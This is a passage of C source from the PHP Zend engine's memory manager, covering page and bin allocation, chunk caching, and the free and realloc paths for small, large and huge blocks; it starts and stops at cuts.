static void *zend_mm_alloc_pages(zend_mm_heap *heap, int pages_count, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#else
static void *zend_mm_alloc_pages(zend_mm_heap *heap, int pages_count ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#endif
{
zend_mm_chunk *chunk = heap->main_chunk;
int page_num, len;
while (1) {
if (UNEXPECTED(chunk->free_pages < pages_count)) {
goto not_found;
#if 0
} else if (UNEXPECTED(chunk->free_pages + chunk->free_tail == ZEND_MM_PAGES)) {
if (UNEXPECTED(ZEND_MM_PAGES - chunk->free_tail < pages_count)) {
goto not_found;
} else {
page_num = chunk->free_tail;
goto found;
}
} else if (0) {
/* First-Fit Search */
int free_tail = chunk->free_tail;
zend_mm_bitset *bitset = chunk->free_map;
zend_mm_bitset tmp = *(bitset++);
int i = 0;
while (1) {
/* skip allocated blocks */
while (tmp == (zend_mm_bitset)-1) {
i += ZEND_MM_BITSET_LEN;
if (i == ZEND_MM_PAGES) {
goto not_found;
}
tmp = *(bitset++);
}
/* find first 0 bit */
page_num = i + zend_mm_bitset_nts(tmp);
/* reset bits from 0 to "bit" */
tmp &= tmp + 1;
/* skip free blocks */
while (tmp == 0) {
i += ZEND_MM_BITSET_LEN;
len = i - page_num;
if (len >= pages_count) {
goto found;
} else if (i >= free_tail) {
goto not_found;
}
tmp = *(bitset++);
}
/* find first 1 bit */
len = (i + zend_mm_bitset_ntz(tmp)) - page_num;
if (len >= pages_count) {
goto found;
}
/* set bits from 0 to "bit" */
tmp |= tmp - 1;
}
#endif
} else {
/* Best-Fit Search */
int best = -1;
int best_len = ZEND_MM_PAGES;
int free_tail = chunk->free_tail;
zend_mm_bitset *bitset = chunk->free_map;
zend_mm_bitset tmp = *(bitset++);
int i = 0;
while (1) {
/* skip allocated blocks */
while (tmp == (zend_mm_bitset)-1) {
i += ZEND_MM_BITSET_LEN;
if (i == ZEND_MM_PAGES) {
if (best > 0) {
page_num = best;
goto found;
} else {
goto not_found;
}
}
tmp = *(bitset++);
}
/* find first 0 bit */
page_num = i + zend_mm_bitset_nts(tmp);
/* reset bits from 0 to "bit" */
tmp &= tmp + 1;
/* skip free blocks */
while (tmp == 0) {
i += ZEND_MM_BITSET_LEN;
if (i >= free_tail || i == ZEND_MM_PAGES) {
len = ZEND_MM_PAGES - page_num;
if (len >= pages_count && len < best_len) {
chunk->free_tail = page_num + pages_count;
goto found;
} else {
/* set accurate value */
chunk->free_tail = page_num;
if (best > 0) {
page_num = best;
goto found;
} else {
goto not_found;
}
}
}
tmp = *(bitset++);
}
/* find first 1 bit */
len = i + zend_mm_bitset_ntz(tmp) - page_num;
if (len >= pages_count) {
if (len == pages_count) {
goto found;
} else if (len < best_len) {
best_len = len;
best = page_num;
}
}
/* set bits from 0 to "bit" */
tmp |= tmp - 1;
}
}
not_found:
if (chunk->next == heap->main_chunk) {
get_chunk:
if (heap->cached_chunks) {
heap->cached_chunks_count--;
chunk = heap->cached_chunks;
heap->cached_chunks = chunk->next;
} else {
#if ZEND_MM_LIMIT
if (UNEXPECTED(heap->real_size + ZEND_MM_CHUNK_SIZE > heap->limit)) {
if (zend_mm_gc(heap)) {
goto get_chunk;
} else if (heap->overflow == 0) {
#if ZEND_DEBUG
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted at %s:%d (tried to allocate %zu bytes)", heap->limit, __zend_filename, __zend_lineno, size);
#else
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted (tried to allocate %zu bytes)", heap->limit, ZEND_MM_PAGE_SIZE * pages_count);
#endif
return NULL;
}
}
#endif
chunk = (zend_mm_chunk*)zend_mm_chunk_alloc(heap, ZEND_MM_CHUNK_SIZE, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(chunk == NULL)) {
/* insufficient memory */
if (zend_mm_gc(heap) &&
(chunk = (zend_mm_chunk*)zend_mm_chunk_alloc(heap, ZEND_MM_CHUNK_SIZE, ZEND_MM_CHUNK_SIZE)) != NULL) {
/* pass */
} else {
#if !ZEND_MM_LIMIT
zend_mm_safe_error(heap, "Out of memory");
#elif ZEND_DEBUG
zend_mm_safe_error(heap, "Out of memory (allocated %zu) at %s:%d (tried to allocate %zu bytes)", heap->real_size, __zend_filename, __zend_lineno, size);
#else
zend_mm_safe_error(heap, "Out of memory (allocated %zu) (tried to allocate %zu bytes)", heap->real_size, ZEND_MM_PAGE_SIZE * pages_count);
#endif
return NULL;
}
}
#if ZEND_MM_STAT
do {
size_t size = heap->real_size + ZEND_MM_CHUNK_SIZE;
size_t peak = MAX(heap->real_peak, size);
heap->real_size = size;
heap->real_peak = peak;
} while (0);
#elif ZEND_MM_LIMIT
heap->real_size += ZEND_MM_CHUNK_SIZE;
#endif
}
heap->chunks_count++;
if (heap->chunks_count > heap->peak_chunks_count) {
heap->peak_chunks_count = heap->chunks_count;
}
zend_mm_chunk_init(heap, chunk);
page_num = ZEND_MM_FIRST_PAGE;
len = ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE;
goto found;
} else {
chunk = chunk->next;
}
}
found:
/* mark run as allocated */
chunk->free_pages -= pages_count;
zend_mm_bitset_set_range(chunk->free_map, page_num, pages_count);
chunk->map[page_num] = ZEND_MM_LRUN(pages_count);
if (page_num == chunk->free_tail) {
chunk->free_tail = page_num + pages_count;
}
return ZEND_MM_PAGE_ADDR(chunk, page_num);
}
static zend_always_inline void *zend_mm_alloc_large(zend_mm_heap *heap, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
int pages_count = (int)ZEND_MM_SIZE_TO_NUM(size, ZEND_MM_PAGE_SIZE);
#if ZEND_DEBUG
void *ptr = zend_mm_alloc_pages(heap, pages_count, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
void *ptr = zend_mm_alloc_pages(heap, pages_count ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
#if ZEND_MM_STAT
do {
size_t size = heap->size + pages_count * ZEND_MM_PAGE_SIZE;
size_t peak = MAX(heap->peak, size);
heap->size = size;
heap->peak = peak;
} while (0);
#endif
return ptr;
}
static zend_always_inline void zend_mm_delete_chunk(zend_mm_heap *heap, zend_mm_chunk *chunk)
{
chunk->next->prev = chunk->prev;
chunk->prev->next = chunk->next;
heap->chunks_count--;
if (heap->chunks_count + heap->cached_chunks_count < heap->avg_chunks_count + 0.1) {
		/* delay deletion: cache the chunk while the chunk count stays below the
		 * average per-request usage, to avoid repeated unmap/map cycles */
heap->cached_chunks_count++;
chunk->next = heap->cached_chunks;
heap->cached_chunks = chunk;
} else {
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size -= ZEND_MM_CHUNK_SIZE;
#endif
if (!heap->cached_chunks || chunk->num > heap->cached_chunks->num) {
zend_mm_chunk_free(heap, chunk, ZEND_MM_CHUNK_SIZE);
} else {
//TODO: select the best chunk to delete???
chunk->next = heap->cached_chunks->next;
zend_mm_chunk_free(heap, heap->cached_chunks, ZEND_MM_CHUNK_SIZE);
heap->cached_chunks = chunk;
}
}
}
static zend_always_inline void zend_mm_free_pages_ex(zend_mm_heap *heap, zend_mm_chunk *chunk, int page_num, int pages_count, int free_chunk)
{
chunk->free_pages += pages_count;
zend_mm_bitset_reset_range(chunk->free_map, page_num, pages_count);
chunk->map[page_num] = 0;
if (chunk->free_tail == page_num + pages_count) {
		/* this setting may not be accurate */
chunk->free_tail = page_num;
}
if (free_chunk && chunk->free_pages == ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE) {
zend_mm_delete_chunk(heap, chunk);
}
}
static void zend_mm_free_pages(zend_mm_heap *heap, zend_mm_chunk *chunk, int page_num, int pages_count)
{
zend_mm_free_pages_ex(heap, chunk, page_num, pages_count, 1);
}
static zend_always_inline void zend_mm_free_large(zend_mm_heap *heap, zend_mm_chunk *chunk, int page_num, int pages_count)
{
#if ZEND_MM_STAT
heap->size -= pages_count * ZEND_MM_PAGE_SIZE;
#endif
zend_mm_free_pages(heap, chunk, page_num, pages_count);
}
/**************/
/* Small Runs */
/**************/
/* highest set bit number, 1-based (0->N/A, 1->1, 2->2, 4->3, 8->4, 127->7, 128->8, etc.) */
static zend_always_inline int zend_mm_small_size_to_bit(int size)
{
#if (defined(__GNUC__) || __has_builtin(__builtin_clz)) && defined(PHP_HAVE_BUILTIN_CLZ)
return (__builtin_clz(size) ^ 0x1f) + 1;
#elif defined(_WIN32)
unsigned long index;
if (!BitScanReverse(&index, (unsigned long)size)) {
/* undefined behavior */
return 64;
}
return (((31 - (int)index) ^ 0x1f) + 1);
#else
int n = 16;
if (size <= 0x00ff) {n -= 8; size = size << 8;}
if (size <= 0x0fff) {n -= 4; size = size << 4;}
if (size <= 0x3fff) {n -= 2; size = size << 2;}
if (size <= 0x7fff) {n -= 1;}
return n;
#endif
}
#ifndef MAX
# define MAX(a, b) (((a) > (b)) ? (a) : (b))
#endif
#ifndef MIN
# define MIN(a, b) (((a) < (b)) ? (a) : (b))
#endif
static zend_always_inline int zend_mm_small_size_to_bin(size_t size)
{
#if 0
int n;
/*0, 1, 2, 3, 4, 5, 6, 7, 8, 9 10, 11, 12*/
static const int f1[] = { 3, 3, 3, 3, 3, 3, 3, 4, 5, 6, 7, 8, 9};
static const int f2[] = { 0, 0, 0, 0, 0, 0, 0, 4, 8, 12, 16, 20, 24};
if (UNEXPECTED(size <= 2)) return 0;
n = zend_mm_small_size_to_bit(size - 1);
return ((size-1) >> f1[n]) + f2[n];
#else
unsigned int t1, t2;
if (size <= 64) {
/* we need to support size == 0 ... */
return (size - !!size) >> 3;
} else {
t1 = size - 1;
t2 = zend_mm_small_size_to_bit(t1) - 3;
t1 = t1 >> t2;
t2 = t2 - 3;
t2 = t2 << 2;
return (int)(t1 + t2);
}
#endif
}
#define ZEND_MM_SMALL_SIZE_TO_BIN(size) zend_mm_small_size_to_bin(size)
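/*
 * Worked example for zend_mm_small_size_to_bin(): bins 0-7 cover multiples
 * of 8 up to 64 bytes, so sizes 1-8 map to bin 0 (8-byte elements), 50 maps
 * to bin 6 (56 bytes) and 64 to bin 7 (64 bytes); above 64 bytes the second
 * branch takes over, e.g. 65 maps to bin 8 (the 80-byte class, assuming the
 * standard zend_alloc_sizes.h table).
 */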
static zend_never_inline void *zend_mm_alloc_small_slow(zend_mm_heap *heap, int bin_num ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
zend_mm_chunk *chunk;
int page_num;
zend_mm_bin *bin;
zend_mm_free_slot *p, *end;
#if ZEND_DEBUG
bin = (zend_mm_bin*)zend_mm_alloc_pages(heap, bin_pages[bin_num], bin_data_size[bin_num] ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
bin = (zend_mm_bin*)zend_mm_alloc_pages(heap, bin_pages[bin_num] ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
if (UNEXPECTED(bin == NULL)) {
/* insufficient memory */
return NULL;
}
chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(bin, ZEND_MM_CHUNK_SIZE);
page_num = ZEND_MM_ALIGNED_OFFSET(bin, ZEND_MM_CHUNK_SIZE) / ZEND_MM_PAGE_SIZE;
chunk->map[page_num] = ZEND_MM_SRUN(bin_num);
if (bin_pages[bin_num] > 1) {
int i = 1;
do {
chunk->map[page_num+i] = ZEND_MM_NRUN(bin_num, i);
i++;
} while (i < bin_pages[bin_num]);
}
/* create a linked list of elements from 1 to last */
end = (zend_mm_free_slot*)((char*)bin + (bin_data_size[bin_num] * (bin_elements[bin_num] - 1)));
heap->free_slot[bin_num] = p = (zend_mm_free_slot*)((char*)bin + bin_data_size[bin_num]);
do {
		p->next_free_slot = (zend_mm_free_slot*)((char*)p + bin_data_size[bin_num]);
#if ZEND_DEBUG
do {
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + bin_data_size[bin_num] - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
dbg->size = 0;
} while (0);
#endif
p = (zend_mm_free_slot*)((char*)p + bin_data_size[bin_num]);
} while (p != end);
/* terminate list using NULL */
p->next_free_slot = NULL;
#if ZEND_DEBUG
do {
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + bin_data_size[bin_num] - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
dbg->size = 0;
} while (0);
#endif
/* return first element */
return (char*)bin;
}
static zend_always_inline void *zend_mm_alloc_small(zend_mm_heap *heap, size_t size, int bin_num ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
#if ZEND_MM_STAT
do {
size_t size = heap->size + bin_data_size[bin_num];
size_t peak = MAX(heap->peak, size);
heap->size = size;
heap->peak = peak;
} while (0);
#endif
if (EXPECTED(heap->free_slot[bin_num] != NULL)) {
zend_mm_free_slot *p = heap->free_slot[bin_num];
heap->free_slot[bin_num] = p->next_free_slot;
return (void*)p;
} else {
return zend_mm_alloc_small_slow(heap, bin_num ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
}
static zend_always_inline void zend_mm_free_small(zend_mm_heap *heap, void *ptr, int bin_num)
{
zend_mm_free_slot *p;
#if ZEND_MM_STAT
heap->size -= bin_data_size[bin_num];
#endif
#if ZEND_DEBUG
do {
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)ptr + bin_data_size[bin_num] - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
dbg->size = 0;
} while (0);
#endif
p = (zend_mm_free_slot*)ptr;
p->next_free_slot = heap->free_slot[bin_num];
heap->free_slot[bin_num] = p;
}
/********/
/* Heap */
/********/
#if ZEND_DEBUG
static zend_always_inline zend_mm_debug_info *zend_mm_get_debug_info(zend_mm_heap *heap, void *ptr)
{
size_t page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE);
zend_mm_chunk *chunk;
int page_num;
zend_mm_page_info info;
ZEND_MM_CHECK(page_offset != 0, "zend_mm_heap corrupted");
chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE);
page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
info = chunk->map[page_num];
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
if (EXPECTED(info & ZEND_MM_IS_SRUN)) {
int bin_num = ZEND_MM_SRUN_BIN_NUM(info);
return (zend_mm_debug_info*)((char*)ptr + bin_data_size[bin_num] - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
} else /* if (info & ZEND_MM_IS_LRUN) */ {
int pages_count = ZEND_MM_LRUN_PAGES(info);
return (zend_mm_debug_info*)((char*)ptr + ZEND_MM_PAGE_SIZE * pages_count - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
}
}
#endif
static zend_always_inline void *zend_mm_alloc_heap(zend_mm_heap *heap, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
void *ptr;
#if ZEND_DEBUG
size_t real_size = size;
zend_mm_debug_info *dbg;
/* special handling for zero-size allocation */
size = MAX(size, 1);
size = ZEND_MM_ALIGNED_SIZE(size) + ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info));
if (UNEXPECTED(size < real_size)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu + %zu)", ZEND_MM_ALIGNED_SIZE(real_size), ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
return NULL;
}
#endif
if (size <= ZEND_MM_MAX_SMALL_SIZE) {
ptr = zend_mm_alloc_small(heap, size, ZEND_MM_SMALL_SIZE_TO_BIN(size) ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
} else if (size <= ZEND_MM_MAX_LARGE_SIZE) {
ptr = zend_mm_alloc_large(heap, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
} else {
#if ZEND_DEBUG
size = real_size;
#endif
return zend_mm_alloc_huge(heap, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
}
static zend_always_inline void zend_mm_free_heap(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
size_t page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(page_offset == 0)) {
if (ptr != NULL) {
zend_mm_free_huge(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
} else {
zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE);
int page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
zend_mm_page_info info = chunk->map[page_num];
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
if (EXPECTED(info & ZEND_MM_IS_SRUN)) {
zend_mm_free_small(heap, ptr, ZEND_MM_SRUN_BIN_NUM(info));
} else /* if (info & ZEND_MM_IS_LRUN) */ {
int pages_count = ZEND_MM_LRUN_PAGES(info);
ZEND_MM_CHECK(ZEND_MM_ALIGNED_OFFSET(page_offset, ZEND_MM_PAGE_SIZE) == 0, "zend_mm_heap corrupted");
zend_mm_free_large(heap, chunk, page_num, pages_count);
}
}
}
static size_t zend_mm_size(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
size_t page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(page_offset == 0)) {
return zend_mm_get_huge_block_size(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
} else {
zend_mm_chunk *chunk;
#if 0 && ZEND_DEBUG
zend_mm_debug_info *dbg = zend_mm_get_debug_info(heap, ptr);
return dbg->size;
#else
int page_num;
zend_mm_page_info info;
chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE);
page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
info = chunk->map[page_num];
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
if (EXPECTED(info & ZEND_MM_IS_SRUN)) {
return bin_data_size[ZEND_MM_SRUN_BIN_NUM(info)];
} else /* if (info & ZEND_MM_IS_LARGE_RUN) */ {
return ZEND_MM_LRUN_PAGES(info) * ZEND_MM_PAGE_SIZE;
}
#endif
}
}
static void *zend_mm_realloc_heap(zend_mm_heap *heap, void *ptr, size_t size, size_t copy_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
size_t page_offset;
size_t old_size;
size_t new_size;
void *ret;
#if ZEND_DEBUG
size_t real_size;
zend_mm_debug_info *dbg;
#endif
page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(page_offset == 0)) {
if (UNEXPECTED(ptr == NULL)) {
return zend_mm_alloc_heap(heap, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
old_size = zend_mm_get_huge_block_size(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#if ZEND_DEBUG
real_size = size;
size = ZEND_MM_ALIGNED_SIZE(size) + ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info));
#endif
if (size > ZEND_MM_MAX_LARGE_SIZE) {
#if ZEND_DEBUG
size = real_size;
#endif
#ifdef ZEND_WIN32
			/* On Windows we don't have the ability to extend huge blocks in-place.
			 * We allocate them with 2 MB size granularity to avoid many
			 * reallocations when they are extended by small pieces.
			 */
new_size = ZEND_MM_ALIGNED_SIZE_EX(size, MAX(REAL_PAGE_SIZE, ZEND_MM_CHUNK_SIZE));
#else
new_size = ZEND_MM_ALIGNED_SIZE_EX(size, REAL_PAGE_SIZE);
#endif
if (new_size == old_size) {
#if ZEND_DEBUG
zend_mm_change_huge_block_size(heap, ptr, new_size, real_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
zend_mm_change_huge_block_size(heap, ptr, new_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
return ptr;
} else if (new_size < old_size) {
			/* unmap tail */
if (zend_mm_chunk_truncate(heap, ptr, old_size, new_size)) {
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size -= old_size - new_size;
#endif
#if ZEND_MM_STAT
heap->size -= old_size - new_size;
#endif
#if ZEND_DEBUG
zend_mm_change_huge_block_size(heap, ptr, new_size, real_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
zend_mm_change_huge_block_size(heap, ptr, new_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
return ptr;
}
} else /* if (new_size > old_size) */ {
#if ZEND_MM_LIMIT
if (UNEXPECTED(heap->real_size + (new_size - old_size) > heap->limit)) {
if (zend_mm_gc(heap) && heap->real_size + (new_size - old_size) <= heap->limit) {
/* pass */
} else if (heap->overflow == 0) {
#if ZEND_DEBUG
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted at %s:%d (tried to allocate %zu bytes)", heap->limit, __zend_filename, __zend_lineno, size);
#else
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted (tried to allocate %zu bytes)", heap->limit, size);
#endif
return NULL;
}
}
#endif
/* try to map tail right after this block */
if (zend_mm_chunk_extend(heap, ptr, old_size, new_size)) {
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size += new_size - old_size;
#endif
#if ZEND_MM_STAT
heap->real_peak = MAX(heap->real_peak, heap->real_size);
heap->size += new_size - old_size;
heap->peak = MAX(heap->peak, heap->size);
#endif
#if ZEND_DEBUG
zend_mm_change_huge_block_size(heap, ptr, new_size, real_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
zend_mm_change_huge_block_size(heap, ptr, new_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
return ptr;
}
}
}
} else {
zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE);
int page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
zend_mm_page_info info = chunk->map[page_num];
#if ZEND_DEBUG
size_t real_size = size;
size = ZEND_MM_ALIGNED_SIZE(size) + ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info));
#endif
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
if (info & ZEND_MM_IS_SRUN) {
int old_bin_num, bin_num;
old_bin_num = ZEND_MM_SRUN_BIN_NUM(info);
old_size = bin_data_size[old_bin_num];
bin_num = ZEND_MM_SMALL_SIZE_TO_BIN(size);
if (old_bin_num == bin_num) {
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
}
} else /* if (info & ZEND_MM_IS_LARGE_RUN) */ {
ZEND_MM_CHECK(ZEND_MM_ALIGNED_OFFSET(page_offset, ZEND_MM_PAGE_SIZE) == 0, "zend_mm_heap corrupted");
old_size = ZEND_MM_LRUN_PAGES(info) * ZEND_MM_PAGE_SIZE;
if (size > ZEND_MM_MAX_SMALL_SIZE && size <= ZEND_MM_MAX_LARGE_SIZE) {
new_size = ZEND_MM_ALIGNED_SIZE_EX(size, ZEND_MM_PAGE_SIZE);
if (new_size == old_size) {
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
} else if (new_size < old_size) {
/* free tail pages */
int new_pages_count = (int)(new_size / ZEND_MM_PAGE_SIZE);
int rest_pages_count = (int)((old_size - new_size) / ZEND_MM_PAGE_SIZE);
#if ZEND_MM_STAT
heap->size -= rest_pages_count * ZEND_MM_PAGE_SIZE;
#endif
chunk->map[page_num] = ZEND_MM_LRUN(new_pages_count);
chunk->free_pages += rest_pages_count;
zend_mm_bitset_reset_range(chunk->free_map, page_num + new_pages_count, rest_pages_count);
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
} else /* if (new_size > old_size) */ {
int new_pages_count = (int)(new_size / ZEND_MM_PAGE_SIZE);
int old_pages_count = (int)(old_size / ZEND_MM_PAGE_SIZE);
/* try to allocate tail pages after this block */
if (page_num + new_pages_count <= ZEND_MM_PAGES &&
zend_mm_bitset_is_free_range(chunk->free_map, page_num + old_pages_count, new_pages_count - old_pages_count)) {
#if ZEND_MM_STAT
do {
size_t size = heap->size + (new_size - old_size);
size_t peak = MAX(heap->peak, size);
heap->size = size;
heap->peak = peak;
} while (0);
#endif
chunk->free_pages -= new_pages_count - old_pages_count;
zend_mm_bitset_set_range(chunk->free_map, page_num + old_pages_count, new_pages_count - old_pages_count);
chunk->map[page_num] = ZEND_MM_LRUN(new_pages_count);
#if ZEND_DEBUG
dbg = zend_mm_get_debug_info(heap, ptr);
dbg->size = real_size;
dbg->filename = __zend_filename;
dbg->orig_filename = __zend_orig_filename;
dbg->lineno = __zend_lineno;
dbg->orig_lineno = __zend_orig_lineno;
#endif
return ptr;
}
}
}
}
#if ZEND_DEBUG
size = real_size;
#endif
}
/* Naive reallocation */
#if ZEND_MM_STAT
do {
size_t orig_peak = heap->peak;
size_t orig_real_peak = heap->real_peak;
#endif
ret = zend_mm_alloc_heap(heap, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
memcpy(ret, ptr, MIN(old_size, copy_size));
zend_mm_free_heap(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#if ZEND_MM_STAT
heap->peak = MAX(orig_peak, heap->size);
heap->real_peak = MAX(orig_real_peak, heap->real_size);
} while (0);
#endif
return ret;
}
/*********************/
/* Huge Runs (again) */
/*********************/
#if ZEND_DEBUG
static void zend_mm_add_huge_block(zend_mm_heap *heap, void *ptr, size_t size, size_t dbg_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#else
static void zend_mm_add_huge_block(zend_mm_heap *heap, void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#endif
{
zend_mm_huge_list *list = (zend_mm_huge_list*)zend_mm_alloc_heap(heap, sizeof(zend_mm_huge_list) ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
list->ptr = ptr;
list->size = size;
list->next = heap->huge_list;
#if ZEND_DEBUG
list->dbg.size = dbg_size;
list->dbg.filename = __zend_filename;
list->dbg.orig_filename = __zend_orig_filename;
list->dbg.lineno = __zend_lineno;
list->dbg.orig_lineno = __zend_orig_lineno;
#endif
heap->huge_list = list;
}
static size_t zend_mm_del_huge_block(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
zend_mm_huge_list *prev = NULL;
zend_mm_huge_list *list = heap->huge_list;
while (list != NULL) {
if (list->ptr == ptr) {
size_t size;
if (prev) {
prev->next = list->next;
} else {
heap->huge_list = list->next;
}
size = list->size;
zend_mm_free_heap(heap, list ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
return size;
}
prev = list;
list = list->next;
}
ZEND_MM_CHECK(0, "zend_mm_heap corrupted");
return 0;
}
static size_t zend_mm_get_huge_block_size(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
zend_mm_huge_list *list = heap->huge_list;
while (list != NULL) {
if (list->ptr == ptr) {
return list->size;
}
list = list->next;
}
ZEND_MM_CHECK(0, "zend_mm_heap corrupted");
return 0;
}
#if ZEND_DEBUG
static void zend_mm_change_huge_block_size(zend_mm_heap *heap, void *ptr, size_t size, size_t dbg_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#else
static void zend_mm_change_huge_block_size(zend_mm_heap *heap, void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#endif
{
zend_mm_huge_list *list = heap->huge_list;
while (list != NULL) {
if (list->ptr == ptr) {
list->size = size;
#if ZEND_DEBUG
